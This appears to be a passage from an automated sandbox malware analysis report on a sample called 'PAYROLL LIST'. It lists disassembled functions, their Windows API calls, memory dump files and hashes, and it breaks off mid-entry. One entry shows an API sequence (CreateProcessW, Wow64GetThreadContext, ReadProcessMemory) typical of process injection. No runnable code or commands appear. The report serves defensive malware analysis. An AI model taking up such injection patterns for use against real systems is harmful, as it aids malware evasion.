Instruction Fuzzy Hash: 62514DB5A04218AFDF149F68DC81BADBBB9EF48310F1000AEF259E3251DB715A808F59

Function 00A3EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A3EBB2

Part of subcall function 00A251AF: _memset.LIBCMT ref: 00A2522F
Part of subcall function 00A251AF: _wcscpy.LIBCMT ref: 00A25283
Part of subcall function 00A251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A25293

KillTimer.USER32(?,00000001,?,?), ref: 00A3EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A3EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A93C88

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 4679dd193dd083c19a1f74f459b066d7a5dc69fcd2ee839dd6d97e184d63b7dc
Instruction ID: f0bab2eb965cd02730029a86b35744c9c9df09c18987b07dcf0c14e44068e0dd
Opcode Fuzzy Hash: 4679dd193dd083c19a1f74f459b066d7a5dc69fcd2ee839dd6d97e184d63b7dc
Instruction Fuzzy Hash: 4721FC71904794AFEF32DB68D855BEBBBFC9B05308F04044DE69F56181C3746A89CB51

Function 00A240E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A93725
GetOpenFileNameW.COMDLG32 ref: 00A9376F

Part of subcall function 00A2660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A253B1,?,?,00A261FF,?,00000000,00000001,00000000), ref: 00A2662F

Part of subcall function 00A240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A240C6

Strings

X, xrefs: 00A9373E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 593197c72d618091bb10cfddefbbf77143c724903bb83b017e6e778789bb002f
Instruction ID: e4507c233c67dbf23a9ce5675b0b49304e38dbebded9add4f89c208bda2b575b
Opcode Fuzzy Hash: 593197c72d618091bb10cfddefbbf77143c724903bb83b017e6e778789bb002f
Instruction Fuzzy Hash: B121B771A102A89FCF01DFD8D945BEE7BF89F89304F00406AE505EB241DBF45A898F65

Function 00A6C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00A6C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A6C746

Strings

aut, xrefs: 00A6C740

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: fb77b4896b773bba243c587c76c3cb90bc8f4709b62511c2758d28d206d98cb5
Instruction ID: 11b9bb0a69884870b52a6ff4cb05d6c7b7dc97aace5dac6684b35180c19c357b
Opcode Fuzzy Hash: fb77b4896b773bba243c587c76c3cb90bc8f4709b62511c2758d28d206d98cb5
Instruction Fuzzy Hash: 12D05E7550030EBBDB10EBA0DC0EFCA776CA700704F0005A17792A50F1DBB0E69ACB55

Function 00A7F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b825a58ef258f7c721fe1f46aaeea877971582ba122f20c353c18780915d2509
Instruction ID: d32f9f9b70c67a5f3b5f39ae4ca9733deb072f98073161f5140ce221451ec8fb
Opcode Fuzzy Hash: b825a58ef258f7c721fe1f46aaeea877971582ba122f20c353c18780915d2509
Instruction Fuzzy Hash: A4F14B716043019FCB10DF28C985B6EB7E5FF88314F14892EF9999B292D770EA45CB82

Function 00A4395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00A43973

Part of subcall function 00A481C2: __NMSG_WRITE.LIBCMT ref: 00A481E9
Part of subcall function 00A481C2: __NMSG_WRITE.LIBCMT ref: 00A481F3

__NMSG_WRITE.LIBCMT ref: 00A4397A

Part of subcall function 00A4821F: GetModuleFileNameW.KERNEL32(00000000,00AE0312,00000104,00000000,00000001,00000000), ref: 00A482B1
Part of subcall function 00A4821F: ___crtMessageBoxW.LIBCMT ref: 00A4835F

Part of subcall function 00A41145: ___crtCorExitProcess.LIBCMT ref: 00A4114B
Part of subcall function 00A41145: ExitProcess.KERNEL32 ref: 00A41154

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

RtlAllocateHeap.NTDLL(00B60000,00000000,00000001,00000001,00000000,?,?,00A3F507,?,0000000E), ref: 00A4399F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 9b22ad76fd4c02d7148ad7ff2c3bce20d278e0a84ef5b10836c1b49c5a19fa82
Instruction ID: 166c9d5e0ea8350750506d2e59ad2d0f833ec369aa06c9f1b98e9ec61773c94e
Opcode Fuzzy Hash: 9b22ad76fd4c02d7148ad7ff2c3bce20d278e0a84ef5b10836c1b49c5a19fa82
Instruction Fuzzy Hash: 7B01B93F345241DAEA217B75EDA2A7E33589FC1760F210125F5059B2C3DFF49D414660

Function 00A6C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00A6C385,?,?,?,?,?,00000004), ref: 00A6C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A6C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00A6C708
CloseHandle.KERNEL32(00000000,?,00A6C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00A6C70F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: b63e7b6191da09ded7cdc45336b02957fdfdeb11f3cb40d1e87965cc32f3e2c4
Instruction ID: 1b7fdc7724e72097915e5c124f33d15fbbd6e7f7af4604021d19fce398375618
Opcode Fuzzy Hash: b63e7b6191da09ded7cdc45336b02957fdfdeb11f3cb40d1e87965cc32f3e2c4
Instruction Fuzzy Hash: 66E08632240214B7DB215B94AC09FDA7B28EB06770F104210FB95694E097B125528798

Function 00A6BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A6BB72

Part of subcall function 00A41C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00A47A85), ref: 00A41CB1
Part of subcall function 00A41C9D: GetLastError.KERNEL32(00000000,?,00A47A85), ref: 00A41CC3

_free.LIBCMT ref: 00A6BB83
_free.LIBCMT ref: 00A6BB95

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction ID: adedfbcb60f217e821ca9fdbd535411b4d38cc82e52ae36a238aa74890be7e0b
Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction Fuzzy Hash: C3E05BA576174147DA3467796F84EB313DC4F44351714081DB459E7146DF24F8C085B4

Function 00A22322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00A222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A224F1), ref: 00A22303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A225A1
CoInitialize.OLE32(00000000), ref: 00A22618
CloseHandle.KERNEL32(00000000), ref: 00A9503A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 0fc42fce975c262a8d6ed8eb6fd20a97995381a62cc7721b7b46120d5c94cfdc
Instruction ID: 5a08c467327cfa3250685d953c419483c5479f462124f0fd4a30dcaa2c261a0d
Opcode Fuzzy Hash: 0fc42fce975c262a8d6ed8eb6fd20a97995381a62cc7721b7b46120d5c94cfdc
Instruction Fuzzy Hash: 5E718DB49013E28EC744EFAAADD0599BBA4F798344780427ED21ACF7B2DB344446CF55

Function 00A23A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00A23A73

Part of subcall function 00A41405: __lock.LIBCMT ref: 00A4140B

Part of subcall function 00A23ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A23AF3
Part of subcall function 00A23ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A23B08

Part of subcall function 00A23D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00A23AA3,?), ref: 00A23D45
Part of subcall function 00A23D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00A23AA3,?), ref: 00A23D57
Part of subcall function 00A23D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AE1148,00AE1130,?,?,?,?,00A23AA3,?), ref: 00A23DC8
Part of subcall function 00A23D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00A23AA3,?), ref: 00A23E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A23AB3

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: ca28f3fbb029cb6b2be4e85ef98239c19568eb8eff7f6b72b618a6f2e55d6fd2
Instruction ID: e48ef18e746e6ca5815aa79ac47ee26ed490da931e5198346e050dd53c71624f
Opcode Fuzzy Hash: ca28f3fbb029cb6b2be4e85ef98239c19568eb8eff7f6b72b618a6f2e55d6fd2
Instruction Fuzzy Hash: 8811C3715043919FC700DF99E98590AFBE8FF95350F00491EF485872A1DB709646CB92

Function 00A4E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00A4EA29
__close_nolock.LIBCMT ref: 00A4EA42

Part of subcall function 00A47BDA: __getptd_noexit.LIBCMT ref: 00A47BDA

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: dbbf2238f600c889488c647b37d2c819a648327f235f91d1df7e61911edf05a6
Instruction ID: 399eae67beef8da21b841a4cdf53aa1596f1e18ad20a87c320fc0708f997413d
Opcode Fuzzy Hash: dbbf2238f600c889488c647b37d2c819a648327f235f91d1df7e61911edf05a6
Instruction Fuzzy Hash: 3211A97A5056909AD711FFA4CA8175C7A617FC2372F264760E4215F1E3CBB48C4187A1

Function 00A3F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00A4395C: __FF_MSGBANNER.LIBCMT ref: 00A43973
Part of subcall function 00A4395C: __NMSG_WRITE.LIBCMT ref: 00A4397A
Part of subcall function 00A4395C: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001,00000001,00000000,?,?,00A3F507,?,0000000E), ref: 00A4399F

std::exception::exception.LIBCMT ref: 00A3F51E
__CxxThrowException@8.LIBCMT ref: 00A3F533

Part of subcall function 00A46805: RaiseException.KERNEL32(?,?,0000000E,00AD6A30,?,?,?,00A3F538,0000000E,00AD6A30,?,00000001), ref: 00A46856

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: c1642ebca31a1caf4b7b89b08bba8af658b09cbd320474b42cfb69e7986ee5ef
Instruction ID: a2f0b345b7fca74818cf2ab30ed495e9c685662b4db2f29013c9c235592708f4
Opcode Fuzzy Hash: c1642ebca31a1caf4b7b89b08bba8af658b09cbd320474b42cfb69e7986ee5ef
Instruction Fuzzy Hash: 1AF0283550021E6BCB04BF98DD019DE77ECAF02354F204426F90AD6191CBB0D64082A5

Function 00A435E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

__lock_file.LIBCMT ref: 00A43629

Part of subcall function 00A44E1C: __lock.LIBCMT ref: 00A44E3F

__fclose_nolock.LIBCMT ref: 00A43634

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: c98538594bf0c5f0bfd25dffe0414386498d1e471c569d39012966149aa2cdec
Instruction ID: 90dc44012dcfb6d239b393681fff888289b524d7145a249981baa1803d9049d8
Opcode Fuzzy Hash: c98538594bf0c5f0bfd25dffe0414386498d1e471c569d39012966149aa2cdec
Instruction Fuzzy Hash: A8F0B43B841605AADF117F75890276FFAE06FC1730F26C109E425AB2C1CB7C8A019F56

Function 00BA7E5D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00BA861B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BA86B1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BA86D3

Memory Dump Source

Source File: 00000000.00000002.2134012780.0000000000BA6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba6000_PAYROLL LIST.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: b248f1deca88d1c6b5f49666f1a811d4aed4d0af3e736f894bd9f64291a590ce
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: 2812E020E18658C6EB24DF64D8507DEB272EF69300F1090E9910DEB7A5E77A4F81CF5A

Function 00A42957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00A42A0B

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: f392ad28983603ba886b6bd34fdcc7ce42ed62460ee95e8345d92429ac616479
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: 19418279600706AFDB288FA9C9817AE7BB6AFC43A0B64853DF855C7245EB70DD418B40

Function 00A3ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00A3EDC7

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: b67a2b38f9caaab84679058d37f4c0df34cff6ee1c676897921deb5da91fd8aa
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 0131B174A001059BDB18DF58C480A69FBB6FF49380F6486A5F40ADB2A6DB31EDC1CB90

Function 00A99A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A99A80

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 0336ad7f65844be342260ca109a54c98d44cf20bfef01b015d14c1cb736da0bc
Instruction ID: 187fa5d407f44c2a4da09ac08709939607ce1772b708633c1825da5a5d0d3a77
Opcode Fuzzy Hash: 0336ad7f65844be342260ca109a54c98d44cf20bfef01b015d14c1cb736da0bc
Instruction Fuzzy Hash: 03413A706046518FDB24DF18C494B1ABBF0BF45348F1989ACF99A4B362C776E886CF52

Function 00A241A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A24214: FreeLibrary.KERNEL32(00000000,?), ref: 00A24247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A239FE,?,00000001), ref: 00A241DB

Part of subcall function 00A24291: FreeLibrary.KERNEL32(00000000), ref: 00A242C4

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: a3c02c7331fb5cc7ce6b55bab68bd53472251399cad99fe6b03d1b04b2df9be0
Instruction ID: 9d92655265ede771009da73dd50670fa8db5fff166563897cfb126e983619907
Opcode Fuzzy Hash: a3c02c7331fb5cc7ce6b55bab68bd53472251399cad99fe6b03d1b04b2df9be0
Instruction Fuzzy Hash: 2A11C131610226AACF14EB79EE06FDE77E99F48700F108439F596AA1C1EA709A059B60

Function 00A99B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00A99B51

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
